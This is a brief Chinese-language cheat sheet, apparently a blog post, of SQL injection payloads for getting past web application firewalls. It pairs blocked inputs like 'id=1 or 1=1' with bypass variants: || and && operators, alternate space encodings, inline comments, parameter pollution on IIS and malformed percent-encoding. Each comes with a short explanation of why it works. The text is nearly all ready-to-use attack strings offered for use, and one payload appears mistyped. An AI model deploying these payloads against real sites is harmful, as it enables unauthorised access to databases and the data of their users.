注入绕过笔记

拦截:id=1 or 1=1  绕过:id=1 || 1=1 拦截:id=1 and 1=1 绕过:id=1 && 1=1 原理:在php中or和||相当,and和&&相当 拦截:id=1%20or%201=1 绕过:id=1+or+1=1 id=1%0bor%0b1=1 id=1--s%-aor--s%0a1=1 id=1/*!or*/1=1 id=1()or(1=1) 拦截:id=1%20or%201=1 绕过:id=1/*&id=*/or/*&id=*/1=1 原理:IIS接收后实际转为id=1/*,*/or/*,*/1=1 拦截:id=1%20or%201=1 绕过:id=1%%20o%r%20%1%=1 原理:IIS接收%后如果后面不是正常的16进制编码就去掉%

发表评论